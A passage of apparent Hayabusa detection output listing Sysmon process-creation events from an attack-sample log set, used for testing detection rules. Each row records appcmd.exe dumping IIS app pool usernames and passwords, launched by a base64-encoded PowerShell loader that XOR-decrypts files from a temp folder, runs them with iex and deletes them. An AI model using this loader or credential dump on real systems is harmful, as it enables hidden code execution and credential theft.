AMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.270 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.350 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.581 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.661 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.731 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.811 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 